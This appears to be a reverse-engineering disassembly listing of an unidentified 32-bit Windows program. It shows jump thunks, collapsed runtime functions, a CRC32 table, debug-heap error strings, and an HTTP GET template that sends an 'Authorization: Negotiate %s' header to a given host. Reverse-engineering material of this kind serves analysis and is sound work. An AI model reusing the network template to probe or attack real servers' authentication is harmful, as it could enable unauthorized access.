; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43BB08 proc near ; CODE XREF: _UnwindNestedFrames(EHRegistrationNode *,EHExceptionRecord *)+27�p
; __global_unwind2+13�p
jmp ds:dword_4F64AC
sub_43BB08 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F64B0
; ---------------------------------------------------------------------------
jmp ds:dword_4F64B4
; ---------------------------------------------------------------------------
jmp ds:dword_4F64B8
; ---------------------------------------------------------------------------
jmp ds:dword_4F64BC
; ---------------------------------------------------------------------------
jmp ds:dword_4F64C0
; ---------------------------------------------------------------------------
jmp ds:dword_4F64C4
; ---------------------------------------------------------------------------
jmp ds:dword_4F64C8
; ---------------------------------------------------------------------------
jmp ds:dword_4F64CC
; ---------------------------------------------------------------------------
jmp ds:dword_4F64D0
; ---------------------------------------------------------------------------
jmp ds:dword_4F64D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F64D8
; ---------------------------------------------------------------------------
jmp ds:dword_4F64DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F64E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F64E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F64E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F64EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F64F0
; ---------------------------------------------------------------------------
jmp ds:dword_4F64F4
; ---------------------------------------------------------------------------
jmp ds:dword_4F64F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F64FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F6500
; ---------------------------------------------------------------------------
jmp ds:dword_4F6504
; ---------------------------------------------------------------------------
jmp ds:dword_4F6508
; ---------------------------------------------------------------------------
jmp ds:dword_4F650C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6510
; ---------------------------------------------------------------------------
jmp ds:dword_4F6368
; ---------------------------------------------------------------------------
jmp ds:dword_4F6364
; ---------------------------------------------------------------------------
jmp ds:dword_4F6360
; ---------------------------------------------------------------------------
jmp ds:dword_4F635C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6358
; ---------------------------------------------------------------------------
jmp ds:dword_4F6354
; ---------------------------------------------------------------------------
jmp ds:dword_4F6350
; ---------------------------------------------------------------------------
jmp ds:dword_4F634C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6348
; ---------------------------------------------------------------------------
jmp ds:dword_4F6344
; ---------------------------------------------------------------------------
jmp ds:dword_4F6340
; ---------------------------------------------------------------------------
jmp ds:dword_4F633C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6338
; ---------------------------------------------------------------------------
jmp ds:dword_4F6334
; ---------------------------------------------------------------------------
jmp ds:dword_4F6330
; ---------------------------------------------------------------------------
jmp ds:dword_4F632C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6328
; ---------------------------------------------------------------------------
jmp ds:dword_4F6324
; ---------------------------------------------------------------------------
jmp ds:dword_4F6320
; ---------------------------------------------------------------------------
jmp ds:dword_4F631C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6318
; ---------------------------------------------------------------------------
jmp ds:dword_4F6314
; ---------------------------------------------------------------------------
jmp ds:dword_4F6310
; ---------------------------------------------------------------------------
jmp ds:dword_4F630C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6308
; ---------------------------------------------------------------------------
jmp ds:dword_4F6304
; ---------------------------------------------------------------------------
jmp ds:dword_4F6300
; ---------------------------------------------------------------------------
jmp ds:dword_4F62FC
; ---------------------------------------------------------------------------
align 10h
; [000001A1 BYTES: COLLAPSED FUNCTION __wcsicmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000047 BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
mov dword ptr [eax], offset off_43F150
mov ecx, [ebp-4]
mov dword ptr [ecx+4], 0
mov edx, [ebp-4]
mov dword ptr [edx+8], 0
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION exception::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000069 BYTES: COLLAPSED FUNCTION exception::exception(char const * const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION exception::exception(exception const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION exception::operator=(exception const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION exception::~exception(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION exception::what(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000040 BYTES: COLLAPSED FUNCTION type_info::~type_info(void). PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION type_info::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000028 BYTES: COLLAPSED FUNCTION type_info::operator==(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION type_info::operator!=(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION type_info::before(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000011 BYTES: COLLAPSED FUNCTION type_info::raw_name(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000019 BYTES: COLLAPSED FUNCTION type_info::type_info(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION std::_Init_locks::operator=(std::_Init_locks const &). PRESS KEYPAD "+" TO EXPAND]
; [00000041 BYTES: COLLAPSED FUNCTION _CxxThrowException(x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C5 BYTES: COLLAPSED FUNCTION _towlower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B4 BYTES: COLLAPSED FUNCTION sub_43C2C0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002E7 BYTES: COLLAPSED FUNCTION ___crtLCMapStringW. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000056 BYTES: COLLAPSED FUNCTION _wcsncnt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000077 BYTES: COLLAPSED FUNCTION _iswctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION _is_wctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_43C770 proc near ; DATA XREF: .rdata:0043F35C�o
lea ecx, [ebp-38h]
jmp sub_40DD70
sub_43C770 endp
; =============== S U B R O U T I N E =======================================
sub_43C778 proc near ; DATA XREF: .rdata:0043F354�o
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_43C78E
mov ecx, [ebp+8]
jmp sub_40DD70
; ---------------------------------------------------------------------------
locret_43C78E: ; CODE XREF: sub_43C778+8�j
retn
sub_43C778 endp
; ---------------------------------------------------------------------------
loc_43C78F: ; DATA XREF: sub_40D90F�o
mov eax, offset dword_43F330
jmp ___CxxFrameHandler3
; =============== S U B R O U T I N E =======================================
sub_43C799 proc near ; DATA XREF: .rdata:0043F384�o
lea ecx, [ebp+14h]
jmp sub_40DD70
sub_43C799 endp
; =============== S U B R O U T I N E =======================================
sub_43C7A1 proc near ; DATA XREF: .rdata:0043F38C�o
lea ecx, [ebp-1Ch]
jmp sub_40DD70
sub_43C7A1 endp
; ---------------------------------------------------------------------------
loc_43C7A9: ; DATA XREF: sub_40DA86�o
mov eax, offset dword_43F360
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
align 4
loc_43C7B4: ; DATA XREF: sub_40E1AD�o
mov eax, offset dword_43F390
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43C7C0 proc near ; DATA XREF: .rdata:0043F48C�o
lea ecx, [ebp-38h]
call sub_40DD70
retn
sub_43C7C0 endp
; =============== S U B R O U T I N E =======================================
SEH_43B3B0 proc near ; DATA XREF: sub_43B3B0+5�o
mov eax, offset dword_43F468
jmp ___CxxFrameHandler3
SEH_43B3B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43C7E0 proc near ; DATA XREF: .rdata:0043F4B4�o
mov ecx, [ebp-10h]
call ??1exception@@UAE@XZ ; exception::~exception(void)
retn
sub_43C7E0 endp
; =============== S U B R O U T I N E =======================================
SEH_43B410 proc near ; DATA XREF: sub_43B410+5�o
mov eax, offset dword_43F490
jmp ___CxxFrameHandler3
SEH_43B410 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43C800 proc near ; DATA XREF: .rdata:0043F4FC�o
mov ecx, [ebp-10h]
call ??1exception@@UAE@XZ ; exception::~exception(void)
retn
sub_43C800 endp
; =============== S U B R O U T I N E =======================================
SEH_43B4D0 proc near ; DATA XREF: sub_43B4D0+5�o
mov eax, offset dword_43F4D8
jmp ___CxxFrameHandler3
SEH_43B4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43C820 proc near ; DATA XREF: .rdata:0043F524�o
mov ecx, [ebp-14h]
call ??1exception@@UAE@XZ ; exception::~exception(void)
retn
sub_43C820 endp
; =============== S U B R O U T I N E =======================================
SEH_43B590 proc near ; DATA XREF: sub_43B590+5�o
mov eax, offset dword_43F500
jmp ___CxxFrameHandler3
SEH_43B590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43C840 proc near ; DATA XREF: .rdata:0043F58C�o
lea ecx, [ebp-38h]
call sub_40DD70
retn
sub_43C840 endp
; =============== S U B R O U T I N E =======================================
SEH_43B6B0 proc near ; DATA XREF: sub_43B6B0+5�o
mov eax, offset dword_43F568
jmp ___CxxFrameHandler3
SEH_43B6B0 endp
_text ends
; Section 2. (virtual address 0003D000)
; Virtual size : 00002590 ( 9616.)
; Section size in file : 00002590 ( 9616.)
; Offset to raw data for section: 0003D000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 43D000h
dd 0
aSfsf db 'FSF',0
align 4
dd 2, 5Fh, 0
dd 5AC00h
dword_43D01C dd 0 ; DATA XREF: sub_401070+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_43D41C dd 2Eh ; DATA XREF: sub_401CC7+3483�o
; sub_401CC7+356F�o ...
dword_43D420 dd 2Eh ; DATA XREF: sub_401CC7+38AB�o
; sub_401CC7+38E5�o ...
; char aGetHttp1_0Host[]
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40DA86+68�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dbl_43D460 dq 1.388888888888889e-2 ; DATA XREF: sub_40D8C3+2F�r
dbl_43D468 dq 1.666666666666667e-1 ; DATA XREF: sub_40D8C3+15�r
dbl_43D470 dq 1.333333333333333 ; DATA XREF: sub_40D90F+70�r
dword_43D478 dd 0FFFFFFFFh ; DATA XREF: sub_40DD23+13�r
; sub_40DDA0�r ...
dword_43D47C dd 0 ; DATA XREF: sub_40E087�o
flt_43D480 dd 5.0e-1 ; DATA XREF: sub_40E3FF+39B�r
align 8
dbl_43D488 dq 9.765625e-4 ; DATA XREF: sub_416F9A+2BD�r
; sub_416F9A+2D8�r ...
dbl_43D490 dq -1.52587890625e-4 ; DATA XREF: sub_418688+3E5�r
dbl_43D498 dq 3.0517578125e-4 ; DATA XREF: sub_418688+3C5�r
dbl_43D4A0 dq -3.0517578125e-4 ; DATA XREF: sub_418688+342�r
; sub_418688+3A7�r
dbl_43D4A8 dq 1.52587890625e-4 ; DATA XREF: sub_418688+271�r
dbl_43D4B0 dq -1.739501953125e-3 ; DATA XREF: sub_418688+24B�r
; sub_418688+2D5�r ...
dbl_43D4B8 dq 3.11279296875e-3 ; DATA XREF: sub_418688+E1�r
dbl_43D4C0 dq 3.0517578125e-5 ; DATA XREF: sub_418688+AE�r
; sub_418688+138�r ...
dbl_43D4C8 dq 6.103515625e-5 ; DATA XREF: sub_418688+93�r
; sub_418688+308�r
dbl_43D4D0 dq 2.288818359375e-3 ; DATA XREF: sub_418688+21�r
dbl_43D4D8 dq -3.0517578125e-5 ; DATA XREF: sub_419589+2B�r
flt_43D4E0 dd 9.765625e-4 ; DATA XREF: sub_41B3ED+1B0�r
flt_43D4E4 dd 8.0 ; DATA XREF: sub_41B3ED+1AA�r
flt_43D4E8 dd 0.0 ; DATA XREF: sub_41B3ED+171�r
flt_43D4EC dd 1.0e-3 ; DATA XREF: sub_41B3ED+168�r
aFclose_c db 'fclose.c',0 ; DATA XREF: _fclose+1D�o
; __fclose_lk+25�o
align 4
; char aStreamNull[]
aStreamNull db 'stream != NULL',0 ; DATA XREF: _fclose+14�o _fseek+D�o ...
align 4
; char aStrNull[]
aStrNull db 'str != NULL',0 ; DATA XREF: __fclose_lk+1C�o
; sub_41FDD0+45�o ...
aClient db 'Client',0 ; DATA XREF: .data:00452A20�o
align 10h
aIgnore db 'Ignore',0 ; DATA XREF: .data:00452A1C�o
align 4
aCrt db 'CRT',0 ; DATA XREF: .data:00452A18�o
aNormal_0 db 'Normal',0 ; DATA XREF: .data:00452A14�o
align 4
aFree db 'Free',0 ; DATA XREF: .data:off_452A10�o
align 10h
dword_43D540 dd 0FFFFFFFFh, 0 ; DATA XREF: __nh_malloc_dbg+5�o
dd offset sub_41CD3D
aErrorMemoryAll db 'Error: memory allocation: bad memory block type.',0Ah,0
; DATA XREF: __heap_alloc_dbg:loc_41CF0A�o
; _realloc_help:loc_41D390�o
align 10h
; char aInvalidAllocat[]
aInvalidAllocat db 'Invalid allocation size: %u bytes.',0Ah,0
; DATA XREF: __heap_alloc_dbg+11B�o
; char aS_33[]
aS_33 db '%s',0 ; DATA XREF: __heap_alloc_dbg+BC�o
; __heap_alloc_dbg+16F�o ...
align 4
aClientHookAl_0 db 'Client hook allocation failure.',0Ah,0
; DATA XREF: __heap_alloc_dbg:loc_41CE57�o
align 4
; char aClientHookAllo[]
aClientHookAllo db 'Client hook allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: __heap_alloc_dbg+94�o
align 4
aDbgheap_c db 'dbgheap.c',0 ; DATA XREF: __heap_alloc_dbg+31�o
; _realloc_help+77�o ...
align 10h
; char a_crtcheckmemor[]
a_crtcheckmemor db '_CrtCheckMemory()',0 ; DATA XREF: __heap_alloc_dbg+25�o
; _realloc_help+6B�o ...
align 8
dword_43D628 dd 0FFFFFFFFh, 0 ; DATA XREF: __realloc_dbg+5�o
dd offset sub_41D1E3
; char a_pfirstblockPo[]
a_pfirstblockPo db '_pFirstBlock == pOldBlock',0 ; DATA XREF: _realloc_help+499�o
align 10h
; char a_plastblockPol[]
a_plastblockPol db '_pLastBlock == pOldBlock',0 ; DATA XREF: _realloc_help+445�o
align 4
; char aFreallocFreall[]
aFreallocFreall db 'fRealloc || (!fRealloc && pNewBlock == pOldBlock)',0
; DATA XREF: _realloc_help:loc_41D5F6�o
align 10h
; char a_block_typePol[]
a_block_typePol db '_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)',0
; DATA XREF: _realloc_help+277�o
align 4
; char aPoldblockNline[]
aPoldblockNline db 'pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_'
; DATA XREF: _realloc_help:loc_41D421�o
db 'REQ',0
align 4
; char a_crtisvalidhea[]
a_crtisvalidhea db '_CrtIsValidHeapPointer(pUserData)',0 ; DATA XREF: _realloc_help+1B6�o
; sub_41D8A0+A8�o ...
align 4
; char aAllocationTooL[]
aAllocationTooL db 'Allocation too large or negative: %u bytes.',0Ah,0
; DATA XREF: _realloc_help+136�o
align 4
aClientHookRe_0 db 'Client hook re-allocation failure.',0Ah,0
; DATA XREF: _realloc_help:loc_41D30F�o
; char aClientHookReAl[]
aClientHookReAl db 'Client hook re-allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: _realloc_help+DC�o
align 8
dword_43D7D8 dd 0FFFFFFFFh, 0 ; DATA XREF: __expand_dbg+5�o
dd offset sub_41D7C3
align 8
dword_43D7E8 dd 0FFFFFFFFh, 0 ; DATA XREF: __free_dbg+5�o
dd offset sub_41D882
; char a_pfirstblockPh[]
a_pfirstblockPh db '_pFirstBlock == pHead',0 ; DATA XREF: sub_41D8A0+35D�o
align 4
; char a_plastblockPhe[]
a_plastblockPhe db '_pLastBlock == pHead',0 ; DATA XREF: sub_41D8A0+307�o
align 4
; char aPheadNblockuse[]
aPheadNblockuse db 'pHead->nBlockUse == nBlockUse',0 ; DATA XREF: sub_41D8A0+29C�o
; sub_41DCB0+133�o
align 4
; char aPheadNlineIgno[]
aPheadNlineIgno db 'pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ',0
; DATA XREF: sub_41D8A0:loc_41DAC4�o
align 4
; char aDamageAfterHsB[]
aDamageAfterHsB db 'DAMAGE: after %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_41D8A0+1E5�o
; sub_41DFF0+265�o
align 10h
; char aDamageBeforeHs[]
aDamageBeforeHs db 'DAMAGE: before %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_41D8A0+17F�o
; sub_41DFF0+208�o
align 4
; char a_block_type_is[]
a_block_type_is db '_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)',0 ; DATA XREF: sub_41D8A0+10A�o
; sub_41DCB0+E2�o ...
align 4
aClientHookFree db 'Client hook free failure.',0Ah,0 ; DATA XREF: sub_41D8A0:loc_41D90D�o
align 10h
dword_43D920 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41DCB0+5�o
dd offset sub_41DE21
align 10h
dword_43D930 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtSetDbgBlockType+5�o
dd offset sub_41DF1D
; char aMemoryCheckErr[]
aMemoryCheckErr db 'memory check error at 0x%08X = 0x%02X, should be 0x%02X.',0Ah,0
; DATA XREF: _CheckBytes+54�o
align 4
; char aHsLocatedAt0x0[]
aHsLocatedAt0x0 db '%hs located at 0x%08X is %u bytes long.',0Ah,0
; DATA XREF: sub_41DFF0+33A�o
align 4
; char aHsAllocatedAtF[]
aHsAllocatedAtF db '%hs allocated at file %hs(%d).',0Ah,0 ; DATA XREF: sub_41DFF0+307�o
; char aDamageOnTopOfF[]
aDamageOnTopOfF db 'DAMAGE: on top of Free block at 0x%08X.',0Ah,0
; DATA XREF: sub_41DFF0+2BE�o
align 10h
aDamaged db 'DAMAGED',0 ; DATA XREF: sub_41DFF0:loc_41E1C4�o
a_heapchkFail_3 db '_heapchk fails with unknown return value!',0Ah,0
; DATA XREF: sub_41DFF0:loc_41E11C�o
align 4
a_heapchkFail_2 db '_heapchk fails with _HEAPBADPTR.',0Ah,0
; DATA XREF: sub_41DFF0:loc_41E0F4�o
align 4
a_heapchkFail_1 db '_heapchk fails with _HEAPBADEND.',0Ah,0
; DATA XREF: sub_41DFF0:loc_41E0CC�o
align 4
a_heapchkFail_0 db '_heapchk fails with _HEAPBADNODE.',0Ah,0
; DATA XREF: sub_41DFF0:loc_41E0A4�o
align 10h
a_heapchkFailsW db '_heapchk fails with _HEAPBADBEGIN.',0Ah,0
; DATA XREF: sub_41DFF0:loc_41E079�o
align 8
dword_43DAB8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41DFF0+5�o
dd offset sub_41E365
align 8
dword_43DAC8 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtDoForAllClientObjects+5�o
dd offset sub_41E45D
align 8
dword_43DAD8 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtIsMemoryBlock+5�o
dd offset sub_41E706
; char aBadMemoryBlock[]
aBadMemoryBlock db 'Bad memory block found at 0x%08X.',0Ah,0 ; DATA XREF: sub_41E750+13C�o
align 4
a_crtmemcheckpo db '_CrtMemCheckPoint: NULL state pointer.',0Ah,0
; DATA XREF: sub_41E750:loc_41E779�o
dword_43DB30 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41E750+5�o
dd offset sub_41E8D8
a_crtmemdiffere db '_CrtMemDifference: NULL state pointer.',0Ah,0
; DATA XREF: __CrtMemDifference:loc_41E922�o
aObjectDumpComp db 'Object dump complete.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince:loc_41ECEC�o
align 4
; char aCrtBlockAt0x08[]
aCrtBlockAt0x08 db 'crt block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince+271�o
align 10h
; char aNormalBlockAt0[]
aNormalBlockAt0 db 'normal block at 0x%08X, %u bytes long.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince+214�o
; char aClientBlockAt0[]
aClientBlockAt0 db 'client block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince+1A9�o
; char aLd[]
aLd db '{%ld} ',0 ; DATA XREF: __CrtMemDumpAllObjectsSince+15A�o
align 4
; char aHsD[]
aHsD db '%hs(%d) : ',0 ; DATA XREF: __CrtMemDumpAllObjectsSince+132�o
align 10h
; char aFileErrorD[]
aFileErrorD db '#File Error#(%d) : ',0 ; DATA XREF: __CrtMemDumpAllObjectsSince+101�o
aDumpingObjects db 'Dumping objects ->',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince:loc_41EA6B�o
dword_43DC48 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtMemDumpAllObjectsSince+5�o
dd offset sub_41ECE1
; char aDataSS[]
aDataSS db ' Data: <%s> %s',0Ah,0 ; DATA XREF: __printMemBlockData+EC�o
; char a_2x[]
a_2x db '%.2X ',0 ; DATA XREF: __printMemBlockData+BF�o
align 4
aDetectedMemory db 'Detected memory leaks!',0Ah,0
; DATA XREF: __CrtDumpMemoryLeaks:loc_41EE84�o
; char aTotalAllocatio[]
aTotalAllocatio db 'Total allocations: %ld bytes.',0Ah,0
; DATA XREF: __CrtMemDumpStatistics+9D�o
align 4
; char aLargestNumberU[]
aLargestNumberU db 'Largest number used: %ld bytes.',0Ah,0
; DATA XREF: __CrtMemDumpStatistics+75�o
align 4
; char aLdBytesInLdHsB[]
aLdBytesInLdHsB db '%ld bytes in %ld %hs Blocks.',0Ah,0
; DATA XREF: __CrtMemDumpStatistics+4B�o
align 4
; char aMode_t0[]
aMode_t0 db '*mode != _T(',27h,'\0',27h,')',0 ; DATA XREF: __fsopen+95�o
align 4
; char aModeNull[]
aModeNull db 'mode != NULL',0 ; DATA XREF: __fsopen+67�o
; __openfile+4F�o
align 4
; char aFile_t0[]
aFile_t0 db '*file != _T(',27h,'\0',27h,')',0 ; DATA XREF: __fsopen+3D�o
align 10h
aFopen_c db 'fopen.c',0 ; DATA XREF: __fsopen+18�o __fsopen+46�o ...
; char aFileNull[]
aFileNull db 'file != NULL',0 ; DATA XREF: __fsopen+F�o
align 4
; char aFormatNull[]
aFormatNull db 'format != NULL',0 ; DATA XREF: _sprintf+45�o
; __snprintf+45�o ...
align 4
aSprintf_c db 'sprintf.c',0 ; DATA XREF: _sprintf+24�o _sprintf+4E�o ...
align 4
; char aStringNull[]
aStringNull db 'string != NULL',0 ; DATA XREF: _sprintf+1B�o
; __snprintf+1B�o ...
align 4
aFgets_c db 'fgets.c',0 ; DATA XREF: sub_41FDD0+24�o
; sub_41FDD0+4E�o
aFprintf_c db 'fprintf.c',0 ; DATA XREF: _fprintf+1E�o _fprintf+48�o
align 4
aVsprintf_c db 'vsprintf.c',0 ; DATA XREF: __vsnprintf+1E�o
; __vsnprintf+48�o
align 4
aSscanf_c db 'sscanf.c',0 ; DATA XREF: _sscanf+24�o _sscanf+4E�o
align 10h
dbl_43DD90 dq 1.0 ; DATA XREF: _floor+99�r _ceil+99�r ...
aDbgdel_cpp db 'dbgdel.cpp',0 ; DATA XREF: operator delete(void *)+62�o
align 4
aOnexit_c db 'onexit.c',0 ; DATA XREF: __onexit+2E�o
; ___onexitinit+8�o
align 10h
aFseek_c db 'fseek.c',0 ; DATA XREF: _fseek+16�o __fseek_lk+19�o
aStrupr_c db 'strupr.c',0 ; DATA XREF: __strupr+133�o
align 4
aMbstowcs_c db 'mbstowcs.c',0 ; DATA XREF: __mbstowcs_lk+32�o
align 10h
; char aSNull[]
